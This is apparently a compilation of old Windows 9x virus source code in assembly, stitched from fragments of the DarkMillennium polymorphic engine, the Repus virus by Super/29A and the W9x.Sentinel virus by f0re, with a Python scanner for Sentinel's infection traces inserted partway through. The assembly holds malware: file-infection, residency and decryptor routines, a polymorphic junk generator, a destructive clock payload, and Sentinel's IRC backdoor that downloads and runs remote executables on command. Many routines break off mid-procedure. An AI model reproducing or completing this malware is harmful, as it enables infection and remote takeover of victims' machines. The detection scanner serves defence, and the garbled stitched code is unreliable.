pop esi
pop ebx
leave
ret
encryption_buffer dw 0
copy_in_buffer endp
get_rnd proc
push bx
xor bx, ax
xor bx, cx
xor bx, dx
xor bx, sp
xor bx, bp
xor bx, si
xor bx, di
in al, 40h
xor bl, al
in al, 40h
add bh, al
in al, 41h
sub bl, al
in al, 41h
xor bh, al
in al, 42h
add bl, al
in al, 42h
sub bh, al
xchg bx, ax
pop bx
ret
get_rnd endp
; Ring0 File_IO
;-------------------------
Ring0_File_IO proc
patch4_val equ Ring0_FileIO + 256 *256 * IFSMgr
patch4 label far
VxDCall IFSMgr, Ring0_FileIO
ret
Ring0_File_IO endp
file_open proc
mov bx, 2
mov cx, 0
mov dx, 1
mov eax, R0_opencreatefile
call Ring0_File_IO
ret
file_open endp
file_close proc
mov eax, R0_closefile
call Ring0_File_IO
ret
file_close endp
file_read proc
mov eax, R0_readfile
call Ring0_File_IO
ret
file_read endp
file_write proc
mov eax, R0_writefile
call Ring0_File_IO
ret
file_write endp
Payload proc
; as you see if the random number =< 500 then test the PC for year 2000
; compatibility :)
; in fact it will jump into year 2000
; the chances to do it are 5%
mov al, 07h
out 70h, al
mov al, 01h
out 71h, al ; day of the month
mov al, 08h
out 70h, al
mov al, 01h
out 71h, al ; month to January
mov al, 09h
out 70h, al
mov al, 00h
out 71h, al ; year (0 = 2000)
; by the way ... this is a good test, you will see if your computer is compatible
; with year 2000 ;)
; so I recommend you get infected with DarkMillennium
end_payload:popad
ret
WinBox dd ?
butt1 dw 0
butt2 dw 0001
butt3 dw 0
TitleOff dd offset WinTitle
TextOff dd offset WinText
Payload endp
bmp_Payload proc
pushad
; Open the file
lea esi, [edi + filename - Start]
call file_open
mov dword ptr [edi + handle - Start], eax
; Read file
lea esi, [edi + gfx_buffer - Start]
mov ebx, [edi + handle - Start]
mov ecx, 256
mov edx, 54
call file_read
; Write file
lea esi, [edi + gfx_buffer - Start]
mov ecx, 256
mov ebx, [edi + handle - Start]
mov edx, 54
call file_write
; Close file
mov ebx, [edi + handle - Start]
call file_close
popad
ret
bmp_Payload endp
gif_Payload proc
pushad
; Read file
lea esi, [edi + gfx_buffer - Start]
mov ebx, eax
mov ecx, 10Dh
mov edx, 0000h
call file_read
mov ax, 2
get_colours:shl ax, 1
loop get_colours
mov cx, ax
shl ax, 1
add cx, ax
lea esi, [edi + gfx_buffer - Start]
add esi, 000Dh
push edi
mov edi, esi
darken: lodsb
cmp al, 14h
jb skip_entry
sub al, 14h
stosb
skip_entry: loop darken
pop edi
exit_gif_payload:
; Close file
mov ebx, [edi + handle - Start]
call file_close
popad
ret
gif_Payload endp
; ------------------------------------------------------------
;| Poly Engine |
; ------------------------------------------------------------
; Generate decryptor
; EBP = location for decryptor
GenDecryptor proc
; call 00000000h
mov al, 0E8h
stosb
mov eax, 00000000h
stosd
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
call GenerateRegisters
; pushad
mov al, 60h
stosb
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; lea reg_1, [ebp + key - Start] -> key offset will be setted later
mov al, 8Dh
stosb
mov al, byte ptr [ebp + reg_1 - Start]
mov ebx, 8
mul ebx
add al, 85h
stosb
mov [ebp + var2 - Start], edi ; save EDI offset, for later use
mov eax, 00000000h
stosd
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; inc reg_2
mov [ebp + var1 - Start], edi ; save in var1 current pos for future use
mov al, 40h
add al, byte ptr [ebp + reg_2 - Start]
stosb
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Save the number of register that contain the key for decryption
mov al, [ebp + reg_2 - Start]
mov [ebp + reg_key - Start], al
call GenerateRegisters
call GenerateFuckRegs
; lea reg_1, [ebp + key - Start] -> key offset will be setted later
mov al, 8Dh
stosb
mov al, byte ptr [ebp + reg_1 - Start]
mov ebx, 8
mul ebx
add al, 85h
stosb
mov [ebp + var3 - Start], edi ; save EDI offset, for later use
mov eax, 00000000h
stosd
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; inc reg_1
mov al, 40h
add al, byte ptr [ebp + reg_1 - Start]
stosb
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; inc reg_1
mov al, 40h
add al, byte ptr [ebp + reg_1 - Start]
stosb
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; dec reg_2
mov al, 48h
add al, byte ptr [ebp + reg_2 - Start]
stosb
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; dec reg_2
mov al, 48h
add al, byte ptr [ebp + reg_2 - Start]
stosb
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; cmp reg_2, 1
mov al, 83h
stosb
mov al, 0F8h
add al, byte ptr [ebp + reg_2 - Start]
stosb
mov al, 01
stosb
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; popad
mov al, 61h
stosb
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
nop
nop
nop
nop
nop
GenDecryptor endp
; Generate reg3, not ESP, not EBP, <> reg1, <> reg2
get_reg_3: mov eax, 8
call random_in_range
cmp al, 4 ; no ESP
jz get_reg_3
cmp al, 5 ; no EBP
jz get_reg_3
cmp al, byte ptr [ebp + reg_1 - Start]
jz get_reg_3
cmp al, byte ptr [ebp + reg_2 - Start]
jz get_reg_3
cmp al, byte ptr [ebp + reg_key - Start]
jz get_reg_1
mov byte ptr [ebp + reg_3 - Start], al
popad
ret
GenerateRegisters endp
get_reg_fuck_2:
mov eax, 15
call random_in_range
cmp al, 7
jg ch_FFh
cmp al, 4 ; no ESP
jz get_reg_fuck_2
cmp al, 5 ; no EBP
jz get_reg_fuck_2
cmp al, byte ptr [ebp + reg_1 - Start]
jz get_reg_fuck_2
cmp al, byte ptr [ebp + reg_2 - Start]
jz get_reg_fuck_2
cmp al, byte ptr [ebp + reg_3 - Start]
jz get_reg_fuck_2
cmp al, byte ptr [ebp + reg_fuck_1 - Start]
jz get_reg_fuck_2
cmp al, byte ptr [ebp + reg_key - Start]
jz get_reg_fuck_2
mov byte ptr [ebp + reg_fuck_2 - Start], al
GenerateFuckRegs_Exit:
popad
ret
GenerateFuckRegs endp
GenPutX1X2 endp
; Generate one byte instruction, put it in [EBP] and increase EBP with 1
; EBP = location for generated code
GenerateOneByteJunk proc
lea esi, [edi + OneByteTable - Start] ; Offset of the table
mov eax, offset EndOneByteTable - offset OneByteTable ; size of table
call random_in_range ; Must generate random numbers
add esi, eax ; Add AX ( AL ) to the offset
mov al, byte ptr [esi] ; Put selected opcode in al
xchg ebp, edi
stosb ; And store it in EDI ( points to
; the decryptor instructions )
xchg ebp, edi
ret
GenerateOneByteJunk endp
; The same with GenPutX1X2 but with random registers and/or values
; NOTE : the registers are not the ones that are already in use
GenRndPutX1X2 proc
xchg ebp, edi
; random in EDX
mov eax, 0FFFFh
call random_in_range
mov dx, ax
shl edx, 10h
mov eax, 0FFFFh
call random_in_range
mov dx, ax
; random types
mov eax, 2
call random_in_range
mov bl, al
mov bh, 00h ; registers like [EAX], [EBX] ... will not be generated, only
; EAX, EBX ...
; 'cause it will give Access Violation in most of the cases
mov ax, bx
call GenerateFuckRegs
mov cl, byte ptr [ebp + reg_fuck_1 - Start]
mov ch, byte ptr [ebp + reg_fuck_2 - Start]
cmp ah, 0
jz mov_esp2
GenMovType endp
not_val_2: push ax
cmp al, 0
jnz not_wordreg
; PUSH reg2
mov al, 50h
add al, ch
stosb
jmp Pop_reg1
; PUSH val
mov ax, 6866h
stosw
mov ax, dx
stosw
mov ch, cl
jmp Pop_reg1
; Generate XOR reg1, reg1 ... ADD reg1, reg2/[reg2]/val ( = MOV reg1, reg2/[reg2]/val )
; EBP = location for code
; CL = reg1
; CH = reg2 ( if CH = 0FFh then use value from EDX instead of reg2 )
; ( in this case AH value will be ignored, no direct mem read like
; MOV EAX, [402000h] 'cause I don't use this kind of instructions in my decryptor )
; AL = type of registry to use 0 = word ( AX, BX ... )
; 1 = dword ( EAX, EBX ... )
; byte registers are not used in my decryptor
; AH = 0 use direct value ( EAX ... )
; 1 use memory address from register ( [EAX], [ESI] ... )
; EDX = use this value instead of reg2 in case CH = 0FFh
;
GenXorAddType proc
xchg ebp, edi
not_val_3: push ax
cmp al, 0
jnz not_wordreg_2
jmp wordreg_2
pop ax
cmp ah, 0
jz dwordreg_2
pop ax
cmp ah, 0
jz wordreg_2_
GenXorAddType_End:
xchg ebp, edi
ret
GenXorAddType endp
not_val_4: push ax
cmp al, 0
jnz not_wordreg_3
jmp wordreg_3
pop ax
cmp ah, 0
jz dwordreg_3
pop ax
cmp ah, 0
jz wordreg_3_
GenSubAddType_End:
xchg ebp, edi
ret
GenSubAddType endp
; Tables
RandomJunkTable:
OneByteJunk dd offset GenerateOneByteJunk
INTs dd offset GenerateINTs
_Nothing dd offset GenNothing
RndPutX1X2 dd offset GenRndPutX1X2
EndRandomJunkTable:
EndINTsTable:
PutX1X2Table:
MovType dd offset GenMovType
PushPopType dd offset GenPushPopType
XorAddType dd offset GenXorAddType
SubAddType dd offset GenSubAddType
EndPutX1X2Table:
regsTable:
reg_1 db 0
reg_2 db 0
reg_3 db 0
reg_key db 0
reg_fuck_1 db 0
reg_fuck_2 db 0
regsTableEnd:
_end:
end Begin
end
;=============;
; Repus virus ;
;=============;
;Coded by Super/29A
;-When an infected file is executed the virus patches IRQ0 handler and waits
; for it to return control to virus in ring0
;-Once in ring0, the virus searches in all caches a valid MZheader to infect,
; modifying EntryPoint (in PEheader) so virus can get control on execution
;-It will infect no more than one MZheader at a time per file system
;-MZheader will be overwritten, however windows executes it with no problems
; (tested under win95,win98,winNT and Win2K)
;-When executing a non infected file that imports APIs from an infected DLL,
; virus will get control on DLL initialization and infect more MZheaders
;-------------------------------------------------------------------
.386p
.model flat,STDCALL
;-------------------------------------------------------------------
VCache_Enum macro
int 20h
dw 0009h
dw 048Bh
endm
;-------------------------------------------------------------------
.data
Title:
db 'Super/29A presents...',0
Text:
db 'Repus.'
db '0' + (VirusSize/100) mod 10
db '0' + (VirusSize/10) mod 10
db '0' + (VirusSize/1) mod 10
db 0
;-------------------------------------------------------------------
.code
;===================================================================
VirusStart:
VirusEntryPoint:
push edx
dec edx
jns JumpHost ; exit if we are running winNT
mov dl,0C3h
Wait_IRQ0:
cmp esp,edx
jb Wait_IRQ0
xchg dl,[ebx]
Next_FSD:
inc ah
jnz Next_FSD ; try next file system
call ebx ; return control to IRQ0 and return just after the CALL
JumpHost:
;-------------------------------------------------------------------
InfectCache:
sub eax,(JumpHost+5-VirusStart)
mov cl,(VirusSize-1)
;Here we are gonna find the pointer to the pending cache writes
mov ch,2
lea eax,[ecx-0Ch] ; EAX=1F4h ;-D
mov edi,[edx+0Ch] ; EDI = VRP (Volume Resource Pointer)
repnz scasd
jnz _ret ; not found :-(
;Now we are gonna insert this cache in the pending cache writes
_ret:
ret
db '29A'
VirusEnd:
;===================================================================
db 1000h dup(90h)
push 0
push offset Title
push offset Text
push 0
call MessageBoxA
push 0
call ExitProcess
HostEntryPoint endp
;===================================================================
ends
end VirusEntryPoint
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SENTINEL.ASM]ÄÄÄ
;........................................................................;
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=;
; w9x.Sentinel 1.1 (c)oded 2000 by f0re
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=;
;
; Abstract
; --------
; This is the sourcecode of my first resident w32 virus. It uses advanced
; EPO (entry point obscuring) and has backdoor capabilities via IRC.
;
;
; Virus Specification
; -------------------
; When an infected file is executed the decryptor receives control and
; decrypts the virus with the decryption key on the stack (see EPO
; specification). Next the virus goes resident by using the vxdcall0
; backdoor and hooks the CreateProcess api by modifying its address in the
; kernel32.dll export table in memory.
;
; When a new process is created the virus routine receives control and, if
; not already present, launches a new thread in which an IRC bot may be
; started (see IRC-BOT specification). Next it will try to infect the
; executed file.
;
; The infection procedure consists globally of the following steps. First
; it will search for a cavity in the file's code section and if one is
; found, it places there the JumpVirus routine (see EPO specification).
; Second it will search for the nth call or jmp opcode in the code section
; to replace it with a call to this routine (again see EPO specification).
; Third it will copy the decryptor to the end of the file. Fourth it
; encrypts and copies the other portion of the virus to the file. The
; encryption key that is used is the offset of the return address of the
; patched api call/jmp. Finally, after the file is infected, the original
; CreateProcess api code is executed.
;
;
; EPO specification
; -----------------
; As already described, during infection the nth api call or (indirect)
; api jmp opcode in the code section of the file is replaced by a call
; to the JumpVirus routine (n is a random number). This routine was placed
; in a cavity somewhere in the code section. The JumpVirus routine holds
; the following 14 bytes of code:
;
; JumpVirusCode:
; xxxx = virtual address of JumpToVirusEntryPoint
; JumpToVirusEntryPoint:
; mov eax, [esp]
; add eax, delta
; jmp eax
;
; From the stack this routine takes the return address from the call. Next
; a precalculated number, called delta, (calculated during infection) is
; added which gives the virtual address of the virus entrypoint. After
; jumping to the virus decryptor code the decryption key is taken from the
; stack (this is the return address from the call) and the virus code can
; be decrypted.
;
; For a virus scanner it is now much harder to decrypt the virus; it first
; needs to find the return address of the api call or the address of the
; cavity and the size of the virus or both to be able to decrypt the
; virus.
;
;
; IRC BOT specification
; ---------------------
; When the IRC routine is launched, it will try to find an internet
; connection and if one is found, it launches an IRC BOT, ***a sentinel***
; which goes to undernet #sntnl. There it will sit and wait for remote
; commands. The nickname of a sentinel consists of a randomly chosen name
; from a list of names followed by two random numbers. In the rest of
; this text the name of a sentinel is indicated by xxx. A sentinel can
; understand a number of commands which can be sent to a sentinel
; privately or to all sentinels at once by sending the message to the
; channel. The following messages are understood:
;
; * all IRC commands, sent with the following structure:
;
; /msg xxx pass /<ircommand> <params>
;
; so for example: /msg xxx pass /privmsg #sntnl :hello there
;
; * the installer-command, sent with the following structure:
;
; /msg xxx pass /ex3c [<ipnumber>] [<get-command>]
;
; where <ipnumber> = ip-number of server where executable should
; be downloaded.
;
; where <get-command> = the exact command according to the HTTP
; protocol to retrieve the file.
;
; So the command may for example look like:
;
; /msg xxx pass /ex3c [123.45.67.89] [GET /filename.exe HTTP/1.0]
;
; If a sentinel receives this command it will download the
; specified file. Only when it has successfully received the
; entire file it will execute the file.
;
; * the status-command, sent with the following structure:
;
; /msg xxx pass /st4t
;
; If a sentinel receives this command, it will show the status of
; the installer. Five different statuses are possible:
;
; Waiting/Unable to connect/Installing/Size error/Done
;
; * the quit-command, sent with the following structure:
;
; /msg xxx pass /qu1t
;
; * the nick-command, sent with the following structure:
;
; /msg xxx pass /n1ck
;
; This command tells a sentinel to change its nick into a random
; 5 character long name.
;
;
; To Compile
; ----------
; tasm32 sentinel.asm /m /ml
; tlink32 -aa sentinel.obj lib\import32.lib
;
;
; Greetz
; ------
; Greetz go to (in random order): Blackjack, Darkman, MrSandman, Mdrg,
; Prizzy, Benny, rgo32, Asmod, Lord Julus, Spanska, DrOwlFS, Bumblebee,
; VirusBuster, LifeWire, Gbyte, r-, veedee, spo0ky, t00fic and last but
; not least all the other people from #virus/#vxers.
;
;
;"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""";
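The infection scheme described in the header above (and implemented in INFECT_FILE further down) leaves two fixed on-disk traces: the word 'll' written at offset 38h of the MZ header (CheckInfectionMark / UpdatePEHeaderWithChanges) and the 14-byte JumpVirus stub written into a code-section cavity by WriteVirusJumpIntoCavity, i.e. a pointer to the stub's own code followed by mov eax,[esp] / add eax,delta / jmp eax (bytes 8B 04 24 05 <delta> FF E0), reached through a call [stub] (FF 15 <va>) patched over an import call or jmp. The Python scanner here is an added example for this page, not part of f0re's source or of 29A: it checks a PE image for both traces and cross-checks a stub candidate by requiring its leading dword to equal the virtual address of the instruction right after it, then counts FF 15 references to the stub in the same section. The PE it builds for the demonstration is constructed in memory and carries only these markers, no virus body; the header offsets are the standard PE ones the source itself uses (section header +08 virtual size, +12 RVA, +16 raw size, +20 raw pointer; ImageBase at PE+34h).

```python
"""Detect the on-disk traces the Sentinel header describes: the 'll' infection
mark at MZ+38h and the 14-byte JumpVirus stub in a code section.
Added example for this zine page (not f0re's code). The sample PE is
constructed in memory and contains only the markers, no virus body."""
import struct

INFECTION_MARK = b"ll"            # word at MZ+38h, set by UpdatePEHeaderWithChanges
STUB_BODY = b"\x8b\x04\x24\x05"   # mov eax,[esp] ; add eax, imm32 (imm32 = delta follows)
STUB_TAIL = b"\xff\xe0"           # jmp eax
STUB_LEN = 14                     # 4-byte pointer + 3 + 5 + 2 bytes of code

def pe_layout(data):
    """Return (image_base, [(name, rva, vsize, raw_off, raw_size), ...]) or None."""
    if data[:2] != b"MZ":
        return None
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        return None
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    image_base = struct.unpack_from("<I", data, pe + 0x34)[0]
    secs = []
    for i in range(nsec):
        off = pe + 24 + opt_size + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, rva, rsize, roff = struct.unpack_from("<IIII", data, off + 8)
        secs.append((name, rva, vsize, roff, rsize))
    return image_base, secs

def find_jumpvirus_stubs(data):
    """Stubs whose leading dword points at their own code (VA of the mov eax,[esp]),
    plus the number of 'call dword ptr [stub]' (FF 15 <stub_va>) sites in that section."""
    layout = pe_layout(data)
    if layout is None:
        return []
    image_base, secs = layout
    hits = []
    for name, rva, _vsize, roff, rsize in secs:
        sec = data[roff:roff + rsize]
        pos = 4
        while True:
            i = sec.find(STUB_BODY, pos)
            if i < 0:
                break
            pos = i + 1
            if i < 4 or sec[i + 8:i + 10] != STUB_TAIL:
                continue
            stub_va = image_base + rva + i - 4
            if struct.unpack_from("<I", sec, i - 4)[0] != stub_va + 4:
                continue          # leading pointer does not reference the stub itself
            delta = struct.unpack_from("<i", sec, i + 4)[0]
            callers = sec.count(b"\xff\x15" + struct.pack("<I", stub_va))
            hits.append({"section": name, "file_offset": roff + i - 4,
                         "delta": delta, "callers": callers})
    return hits

def scan(data):
    """Summarise both indicators for one file image."""
    return {"infection_mark": data[0x38:0x3A] == INFECTION_MARK,
            "stubs": find_jumpvirus_stubs(data)}

def build_sample(infected):
    """Constructed minimal PE: one .text section (RVA 1000h, raw 200h) of NOPs.
    With infected=True the header mark, a self-consistent stub and one caller are planted."""
    image_base, rva, roff, rsize = 0x400000, 0x1000, 0x200, 0x200
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew
    if infected:
        dos[0x38:0x3A] = INFECTION_MARK
    fh = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 28, image_base)        # ImageBase = PE+34h
    sh = struct.pack("<8sIIIIIIHHI", b".text", rsize, rva, rsize, roff, 0, 0, 0, 0, 0x60000020)
    hdr = dos + b"PE\0\0" + fh + opt + sh
    text = bytearray(b"\x90" * rsize)
    if infected:
        stub_off = 0x40
        stub_va = image_base + rva + stub_off
        text[stub_off:stub_off + STUB_LEN] = (struct.pack("<I", stub_va + 4) + STUB_BODY
                                              + struct.pack("<i", 0x1234) + STUB_TAIL)
        text[0x10:0x16] = b"\xff\x15" + struct.pack("<I", stub_va)  # patched call [stub]
    return bytes(hdr.ljust(roff, b"\0") + text)

if __name__ == "__main__":
    print(scan(build_sample(False)))
    print(scan(build_sample(True)))
```

Against a real file use scan(open(path, "rb").read()). The stub shape alone is weak evidence (any hand-written trampoline looks the same), which is why the self-referencing pointer and the caller count are reported alongside it; the 'll' mark at 38h is the cheap first check, since the virus itself skips files that already carry it.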
.386
.model flat, stdcall
locals
jumps
extrn ExitProcess:PROC
include inc\myinc.inc
include inc\wsocks.inc
.data
FirstCopy:
jmp RealStart
Start:
mov eax, dword ptr [esp] ; decryption key
pushad
call GetCurrentOffset
GetCurrentOffset:
pop esi
add esi, (RealStart - GetCurrentOffset)
mov ecx, ((Leap - RealStart)/4 + 1) ; size to decrypt
DecryptVirus:
xor dword ptr [esi], eax ; decryption routine
add esi, 04h
loop DecryptVirus
DecryptionDone:
popad
RealStart:
push ebp
call GetDeltaOffset
GetDeltaOffset:
pop ebp
sub ebp, offset GetDeltaOffset
SetSEH:
lea eax, [ebp + ErrorHandler] ; set new SEH handler
push eax
push dword ptr fs:[0] ; save old SEH handler
mov dword ptr fs:[0], esp ; initiate SEH frame
CheckWindowsVersion:
mov eax, [ebp + kernel32address]
cmp word ptr [eax], 'ZM'
jne ErrorHandler
add eax, [eax + 3ch]
cmp word ptr [eax], 'EP'
jne ErrorHandler
RestoreSEH:
pop dword ptr fs:[0] ; restore old SEH
add esp, 4 ; handler
jmp MainRoutines
ErrorHandler:
mov esp, [esp + 8]
pop dword ptr fs:[0]
add esp, 4
jmp CheckEpoType
MainRoutines:
pushad
call FIND_GETPROCADDRESS_API_ADDRESS
call FIND_VXDCALL0_ADDRESS
call FIND_USER32_BASE_ADDRESS
call GO_RESIDENT
popad
CheckEpoType:
cmp [ebp + epo_opcode], 15FFh
jne EpoJmpExit
EpoCallExit:
mov eax, [ebp + epo_awaa_va] ; [eax]-> va original jmp
pop ebp
jmp [eax]
EpoJmpExit:
mov eax, [ebp + epo_awaa_va] ; [eax]-> va original jmp
mov [esp + 4], eax
pop ebp
pop eax
jmp [eax]
cp_oldapicodeaddress dd 0
cp_newapicodeaddress dd 0
cp_oldapicode db 06h dup(0)
cp_newapicode db 06h dup(0)
k32 db "KERNEL32.dll",0
user32 db "USER32.dll",0
imagehlp db "IMAGEHLP.dll",0
numberofnames dd 0
addressoffunctions dd 0
addressofnames dd 0
addressofordinals dd 0
AONindex dd 0
AGetProcAddress db "GetProcAddress", 0
AGetProcAddressA dd 0
AMessageBox db "MessageBoxA",0
AMessageBeep db "MessageBeep",0
AGetSystemTime db "GetSystemTime",0
AFindFirstFile db "FindFirstFileA",0
ACreateFile db "CreateFileA",0
ASetCurrentDirectory db "SetCurrentDirectoryA",0
ASetFileAttributes db "SetFileAttributesA",0
AGetFileAttributes db "GetFileAttributesA",0
ACreateFileMapping db "CreateFileMappingA",0
AMapViewOfFile db "MapViewOfFile",0
AUnmapViewOfFile db "UnmapViewOfFile",0
ACloseHandle db "CloseHandle",0
ASetFilePointer db "SetFilePointer",0
ASetEndOfFile db "SetEndOfFile",0
AGetModuleHandle db "GetModuleHandleA",0
ASetFileTime db "SetFileTime",0
ALoadLibrary db "LoadLibraryA",0
AGetSystemDirectory db "GetSystemDirectoryA",0
AGetWindowsDirectory db "GetWindowsDirectoryA",0
AGetFileSize db "GetFileSize",0
AGetCurrentDirectory db "GetCurrentDirectoryA",0
AVxdcall0A dd 0
ACheckSumMappedFile db "CheckSumMappedFile",0
maphandle dd 0
mapaddress dd 0
memory dd 0
imagebase dd 0
imagesize dd 0
filealign dd 0
sectionalign dd 0
filehandle dd 0
filesize dd 0
PEheader dd 0
ip_original dd offset OriginalHost
windowtitle db "W9x.Sentinel", 0
msgtxt db "Observing the world f0revir", 0
epo_newip dd 0
epo_cs_rva dd 0
epo_cs_pa dd 0
epo_ipnew_va dd 0
epo_ipnew_rva dd 0
epo_opcode dw 15ffh
epo_aoc_pa dd 0
epo_awaa_va dd offset ip_original
string db "ZZZZZZZZ", 0
ascvalues db "0123456789ABCDEF", 0
FIND_GETPROCADDRESS_API_ADDRESS proc
LoadExportTableData:
mov edi, [ebp + kernel32address] ; get exporttable
add edi, [edi + 3ch] ; address from
mov esi, [edi + 78h] ; kernel's PE header
add esi, [ebp + kernel32address]
BeginProcAddressSearch:
mov esi, [ebp + addressofnames] ; search for GetProc
mov [ebp + AONindex], esi ; Address API in names
mov edi, [esi] ; table
add edi, [ebp + kernel32address]
xor ecx, ecx
lea ebx, [ebp + AGetProcAddress]
TryAgain:
mov esi, ebx
MatchByte:
cmpsb
jne NextOne
cmp byte ptr [esi], 0 ; did the entire string
je GotIt ; match ?
jmp MatchByte
NextOne:
inc cx
add dword ptr [ebp + AONindex], 4 ; get next namepointer
mov esi, [ebp + AONindex] ; in table (4 dwords)
mov edi, [esi]
add edi, [ebp + kernel32address] ; align with kernelbase
jmp TryAgain
GotIt:
shl ecx, 1
mov esi, [ebp + addressofordinals] ; ordinal = nameindex *
add esi, ecx ; size of ordinal entry
xor eax, eax ; + ordinal table base
mov ax, word ptr [esi]
shl eax, 2 ; address of function =
mov esi, [ebp + addressoffunctions] ; ordinal * size of
add esi, eax ; entry of address
mov edi, dword ptr [esi] ; table + base of
add edi, [ebp + kernel32address] ; addresstable
mov [ebp + AGetProcAddressA], edi ; save GPA address
ret
FIND_GETPROCADDRESS_API_ADDRESS endp
FIND_VXDCALL0_ADDRESS proc
FindStartOfKernelExportSection:
mov esi, [ebp + kernel32address]
add esi, dword ptr [esi + 3ch]
mov edi, dword ptr [esi + 78h] ; virtual address of kernel32
add edi, [ebp + kernel32address] ; export section
GetVXDCallAddress:
mov esi, dword ptr [edi + 1Ch] ; get ra of table with
add esi, [ebp + kernel32address] ; pointers to function addresses
mov eax, dword ptr [esi]
add eax, [ebp + kernel32address]
mov [ebp + AVxdcall0A], eax
ret
FIND_VXDCALL0_ADDRESS endp
GETAPI proc
push eax
push dword ptr [ebp + kernel32address] ; load kernelbase
call [ebp + AGetProcAddressA] ; and get api address
jmp eax ; call the api
ret ; return
GETAPI endp
GETUAPI proc
push eax
push dword ptr [ebp + user32address] ; load user32base
call [ebp + AGetProcAddressA] ; and get api address
jmp eax
ret
GETUAPI endp
GETWAPI proc
push eax
push dword ptr [ebp + wsock32address] ; load wsockbase
call [ebp + AGetProcAddressA] ; and get api address
jmp eax
ret
GETWAPI endp
GETIAPI proc
push eax
push dword ptr [ebp + imagehlpaddress]
call [ebp + AGetProcAddressA]
jmp eax
ret
GETIAPI endp
GO_RESIDENT proc
CheckResidency:
mov eax, [ebp + kernel32address]
add eax, 400h
cmp dword ptr [eax], 'er0f'
je MemoryError ; already resident
PageReserve:
push 00020000h or 00040000h
push page_mem_size
push 80060000h
push 00010000h
call dword ptr [ebp + AVxdcall0A]
cmp eax, 0FFFFFFFh
je MemoryError
mov [ebp + resaddress], eax
CalculateVirusVirtualAddress:
mov ecx, offset InterceptCP - Start
add ecx, eax
mov [ebp + cp_newapicodeaddress], ecx
PageCommit:
push 00020000h or 00040000h or 80000000h or 00000008h
push 00000000h
push 00000001h
push page_mem_size
shr eax, 12
push eax
push 00010001h
call dword ptr [ebp + AVxdcall0A]
or eax, eax
je MemoryError
; IN: hookstruct:
; 00 : offset api name
; 04 : old apicodeaddress
; 08 ; offset for old apicode
; 12 ; offset for new apicode
; 16 : new apicodeaddress
CopyVirusToMemory:
cld
lea esi, [ebp + Start]
mov edi, [ebp + resaddress]
mov ecx, Leap-Start
rep movsb
SetResidentFlag:
mov eax, [ebp + kernel32address]
add eax, 400h
shr eax, 12d
ModifyPagePermissions2:
push 20060000h
push 00000000h
push 00000001h
push eax
push 0001000dh
call dword ptr [ebp + AVxdcall0A]
cmp eax, 0FFFFFFFh
je MemoryError
MemoryError:
ret
GO_RESIDENT endp
INFECT_FILE proc
SetFileAttributesToNormal:
push 80h
lea esi, [ebp + myfinddata.fd_cFileName] ; esi = filename
push esi
lea eax, [ebp + ASetFileAttributes]
call GETAPI
OpenFile:
push 0 ; template handle=0
push 20h ; attributes=any file
push 3 ; type= existing file
push 0 ; security option = 0
push 1 ; shared for read
push 80000000h or 40000000h ; generic read write
lea esi, [ebp + filenamebuffer]
push esi ; offset file name
lea eax, [ebp + ACreateFile]
call GETAPI
MapViewOfFile:
push [ebp + memory] ; memory to map
push 0 ; file offset
push 0 ; file offset
push 2 ; file map write mode
push eax ; file map handle
lea eax, [ebp + AMapViewOfFile] ; ok map the file
call GETAPI
or eax, eax
jz CloseMap
mov [ebp + mapaddress], eax ; save that base
CheckForMZMark:
cmp word ptr [eax], 'ZM' ; an exe file?
jne UnmapView
CheckInfectionMark:
cmp word ptr [eax + 38h], 'll' ; already infected?
je UnmapView
NotYetInfected:
mov esi, dword ptr [eax + 3ch]
cmp esi, 200h
ja UnmapView
add esi, eax
cmp dword ptr [esi], 'EP' ; is it a PE file ?
jne UnmapView
mov [ebp + PEheader], esi ; save va PE header
mov eax, [esi + 28h]
mov [ebp + ip_original], eax ; save original ip
mov eax, [esi + 34h]
